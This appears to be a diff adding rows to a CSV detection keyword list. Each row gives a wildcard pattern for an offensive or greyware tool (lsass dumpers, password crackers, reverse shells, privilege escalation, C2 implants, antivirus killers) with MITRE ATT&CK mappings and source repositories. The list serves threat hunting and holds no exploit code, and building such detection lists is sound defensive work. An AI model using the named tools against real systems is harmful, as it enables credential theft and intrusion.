+"*AndrewSpecial-master*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" +"*androidbackup2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*androidfde2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*AnErrupTion/LoGiC.NET*","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","N/A","5","483","75","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z" +"*Anevicon*","offensive_tool_keyword","Anevicon","Attack simulation: Anevicon is a high-performance traffic generator. designed to be as convenient and reliable as it is possible. It sends numerous UDP-packets to a victim. 
thereby simulating an activity that can be produced by your end users or a group of hackers.","T1498 - T1497 - T1496","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/rozgo/anevicon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ANGRYPUPPY2.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" +"*anonsurf.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*ansible2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*anthemtotheego/Detect-Hooks*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*antirez/hping*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","1","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*AntivirusBypass.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*antiword FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*antonioCoco/ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*antonioCoco/JuicyPotatoNG*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*antonioCoco/RoguePotato*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*antonioCoco/RunasCs*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*antonioCoco/RunasCs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*antonioCoco/SspiUacBypass*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*anydesk.exe --set-password*","greyware_tool_keyword","anydesk","setting the AnyDesk service password manually","N/A","N/A","N/A","N/A","RMM","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","5","10","N/A","N/A","N/A","N/A" +"*anypotato.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*aojlhgbkmkahabcmcpifbolnoichfeep*","greyware_tool_keyword","VirtualShield VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*AoratosWin*.zip*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*AoratosWin.csproj*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*AoratosWin.exe*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*AoratosWin.exe*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*AoratosWin.git*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*AoratosWin.sln*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*AoratosWin_*.zip*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense 
Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*apache_felix_remote_shell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*APC_Ijnect_Load.nim*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" +"*apcfdffemoinopelidncddjbhkiblecc*","greyware_tool_keyword","Soul VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*apex2john.py*","offensive_tool_keyword","john","John the Ripper 
jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*apfs_encrypted_volume_passwd.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*APIHookInjectorBin.exe*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*APIHookInjectorBin.log*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - 
TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*APIHookInjectorBin.pdb*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*APIHookInjectorBin.sln*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*apokryptein/secinject*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*apop2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*appdata*\Windows:svchost.exe*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*appdata*\Windows:winrm.vbs*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*AppData\Roaming\uTorrent*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. 
Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*applenotes2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Applet_ReverseTCP.jar*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Application.Lazagne.H*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*applocker_enum*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*applocker-enumerator*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*apt install crunch*","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*apt install gpp-decrypt*","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*apt install hyperion*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*apt install polenum*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*apt install set -y*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*apt install wce*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" +"*APT stands for Advanced Persistence Tomato*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*apt* install john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*apt/etumbot.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*apt/putterpanda.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*APT::Update::Pre-Invoke *}*","greyware_tool_keyword","APT","linux commands abused by attackers - backdoor apt execute a command when invoking apt","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*apt1_virtuallythere.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*APT64/EternalHushFramework*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*apt-get -y install tor *","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*APTortellini/unDefender*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"*APTSimulator*","offensive_tool_keyword","APTSimulator","APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools. APT Simulator is deisgned to make the application as simple as possible. You 